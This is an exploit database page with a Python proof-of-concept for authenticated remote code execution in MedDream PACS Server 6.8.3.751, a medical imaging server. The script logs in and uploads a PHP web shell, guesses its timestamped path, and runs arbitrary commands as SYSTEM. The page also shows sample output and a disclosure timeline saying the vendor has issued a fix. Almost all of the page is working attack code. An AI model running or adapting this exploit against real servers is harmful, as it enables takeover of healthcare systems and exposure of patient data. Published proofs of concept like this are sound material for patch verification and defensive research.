MedDream PACS Server 6.8.3.751 Remote Code Execution

2020.10.03
Credit: bzyo
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

#!/usr/bin/python # # # Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated) # Exploit Author: bzyo # Twitter: @bzyo_ # Exploit Title: MedDream PACS Server 6.8.3.751 - Remote Code Execution (Authenticated) # Date: 2020-10-01 # Vulnerable Software: https://www.softneta.com/products/meddream-pacs-server/ # Vendor Homepage: https://www.softneta.com # Version: 6.8.3.751 # Tested On: Windows 2016 # # # Timeline # 05-02-20: Submitted incident through email, immediate response # 05-04-20: Issue resolved, New version released 6.8.3.1.751 # # Note: Core Vulnerability resides in another product which has been remediated as well # ##PoC## # # 1. create one line php shell to call commands # 2. run script on attacking machine # 3. enter parameters; IP, filename, username, password, command # # # root@kali:~# python meddream.py # Enter IP Address: 192.168.0.223 # Enter payload filename + .php: cmd.php # Enter Username: user1 # Enter Password: SoSecure!! # Enter command: whoami # 212357 # <pre>nt authority\system # </pre> # http://192.168.0.223/Pacs/upload/20201001-212357--cmd.php?cmd=whoami # 404 # 404 # 404 # 404 # 404 # 404 # 404 # 404 # 404 # # from urllib2 import urlopen from bs4 import BeautifulSoup import requests import sys import time from datetime import datetime, timedelta ip_addr = raw_input("Enter IP Address: ") user_file = raw_input("Enter payload filename + .php: ") uname = raw_input("Enter Username: ") pword = raw_input("Enter Password: ") cmd = raw_input("Enter command: ") URL1= 'http://' + ip_addr + '/Pacs/login.php' URL2= 'http://' + ip_addr + '/Pacs/authenticate.php' URL3= 'http://' + ip_addr + '/Pacs/uploadImage.php' def main(): session = requests.Session() site = session.get(URL1) soup = BeautifulSoup(site.content, "html.parser") antispam = soup.find("input", {"name":"formAntiSpam"})["value"] dbname = soup.find("input", {"name":"aetitle"})["value"] login_data = { 'loginvalue': 'login', 'aetitle': dbname, 'username': uname, 'password': pword, 'formAntispam': antispam, 'login': 'Login', } r = session.post(URL2, data = login_data) files = [ ('actionvalue', (None, 'Attach', None)), ('uploadfile', (user_file, open(user_file, 'rb'), 'application/x-php')), ('action', (None, 'Attach', None)), ] r = session.post(URL3, files=files) today = datetime.today() upload_date = today.strftime("%Y%m%d") less = 1 now1 = datetime.now() up_time1 = now1.strftime("%H%M%S") print(up_time1) #varying time checks +/- now2 = now1 - timedelta(seconds=less) up_time2 = now2.strftime("%H%M%S") now3 = now2 - timedelta(seconds=less) up_time3 = now3.strftime("%H%M%S") now4 = now3 - timedelta(seconds=less) up_time4 = now4.strftime("%H%M%S") now5 = now4 - timedelta(seconds=less) up_time5 = now5.strftime("%H%M%S") now6 = now5 - timedelta(seconds=less) up_time6 = now6.strftime("%H%M%S") now7 = now6 - timedelta(seconds=less) up_time7 = now7.strftime("%H%M%S") now8 = now1 + timedelta(seconds=less) up_time8 = now8.strftime("%H%M%S") now9 = now8 + timedelta(seconds=less) up_time9 = now8.strftime("%H%M%S") now10 = now1 + timedelta(seconds=less) up_time10 = now9.strftime("%H%M%S") up_time_array = [up_time1, up_time2, up_time3, up_time4, up_time5, up_time6, up_time7, up_time8, up_time9, up_time10] for i in up_time_array: r = session.get('http://' + ip_addr + '/Pacs/upload/'+ upload_date + "-" + i + "--" + user_file + "?cmd=" + cmd) if r.status_code == 200: print r.content print r.url else: print ("404") if __name__ == '__main__': main()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top